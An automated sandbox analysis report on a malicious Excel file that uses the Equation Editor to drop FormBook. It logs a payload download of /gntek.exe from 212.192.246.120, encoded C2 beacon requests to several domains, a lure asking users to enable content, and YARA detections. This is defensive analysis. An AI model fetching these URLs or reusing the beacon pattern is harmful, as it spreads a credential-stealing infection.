00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: GET /gntek.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 212.192.246.120Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 28 Jan 2022 21:38:38 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.10.3 (Ubuntu)Date: Fri, 28 Jan 2022 21:38:43 GMTContent-Type: text/htmlContent-Length: 178Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: explorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000006.00000000.478937288.0000000004650000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.488752252.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.466126402.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.535157301.0000000000255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000006.00000000.469773360.0000000002CC7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.469773360.0000000002CC7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: vbc.exe, vbc.exe, 00000004.00000002.463015325.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.453577299.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe, 00000005.00000000.458701444.0000000000409000.00000008.00000001.01000000.00000003.sdmp, gntek[1].exe.2.dr, vbc.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: vbc.exe, 00000004.00000002.463015325.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.453577299.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe, 00000005.00000000.458701444.0000000000409000.00000008.00000001.01000000.00000003.sdmp, gntek[1].exe.2.dr, vbc.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000006.00000000.489156075.0000000001BE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.491342843.0000000003E50000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.469773360.0000000002CC7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.478937288.0000000004650000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.478937288.0000000004650000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.469773360.0000000002CC7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.489156075.0000000001BE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.488752252.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.466126402.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.535157301.0000000000255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000006.00000000.478937288.0000000004650000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.469773360.0000000002CC7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.478937288.0000000004650000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.485165517.000000000447A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.487661348.0000000008374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.478539396.00000000044E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.480526320.0000000008404000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.537917620.00000000044E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.540680733.0000000008404000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.540596693.0000000008374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.538461267.000000000460B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.485165517.000000000447A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.487661348.0000000008374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.480526320.0000000008404000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.540680733.0000000008404000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.540596693.0000000008374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.538461267.000000000460B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: msdt.exe, 00000007.00000002.669852411.0000000002C92000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mollyagee.remax.com/b80i/?SZ5TuL=XkBoiSzcHlsmqFkYMGKyxhKE5R0ucNDlHWw1mrTAF5aGMvlxAg1/o3H
          Source: explorer.exe, 00000006.00000000.488752252.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.466126402.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.535157301.0000000000255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000006.00000000.488752252.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.466126402.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.535157301.0000000000255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.488752252.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.466126402.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.535157301.0000000000255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83D9E331.emfJump to behavior
          Source: unknownDNS traffic detected: queries for: www.927291.com
          Source: global trafficHTTP traffic detected: GET /gntek.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 212.192.246.120Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /b80i/?SZ5TuL=UugCFIKTrsouekFBGpmjj1lYYuG7Sqq7seOoZgmvymuhpKhoJBysXVQ1tfM8JEdSTWsNrA==&bZ30xx=0lLLAPA89 HTTP/1.1Host: www.927291.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b80i/?SZ5TuL=J+u8pU8GtC7Crrbw9NxHruIy2NemieD/+UtpUO8UjTwhviPWCSXqrJc4wu/Y5neCzW0Lig==&bZ30xx=0lLLAPA89 HTTP/1.1Host: www.teentykarm.questConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b80i/?SZ5TuL=WIyhNSWdz3ksnrxMd9FPgtApU7fAeJTF2OsSNfT/loR2Vp0doC/CWPkVmL0jl9ASIxbbNA==&bZ30xx=0lLLAPA89 HTTP/1.1Host: www.zoharfine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b80i/?SZ5TuL=XkBoiSzcHlsmqFkYMGKyxhKE5R0ucNDlHWw1mrTAF5aGMvlxAg1/o3H+/I9n3Xzt0JsmTA==&bZ30xx=0lLLAPA89 HTTP/1.1Host: www.mollyagee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.4e0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.668987103.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.495106003.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.488208515.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669043733.0000000000220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.463214486.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669096973.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.505448080.0000000002380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.503909309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.461534405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.4e0000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.4e0000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.668987103.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.668987103.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.495106003.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.495106003.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.488208515.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.488208515.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.669043733.0000000000220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.669043733.0000000000220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.463214486.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.463214486.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.669096973.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.669096973.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.505448080.0000000002380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.505448080.0000000002380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.503909309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.503909309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.461534405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.461534405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
          Source: Screenshot number: 8Screenshot OCR: protected documents the yellow bar above 26 27 28 29 ~ 0 30 31 :j " I ": " : ::' # 0
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gntek[1].exeJump to dropped file
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.4e0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.4e0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.668987103.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.668987103.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.495106003.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.495106003.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
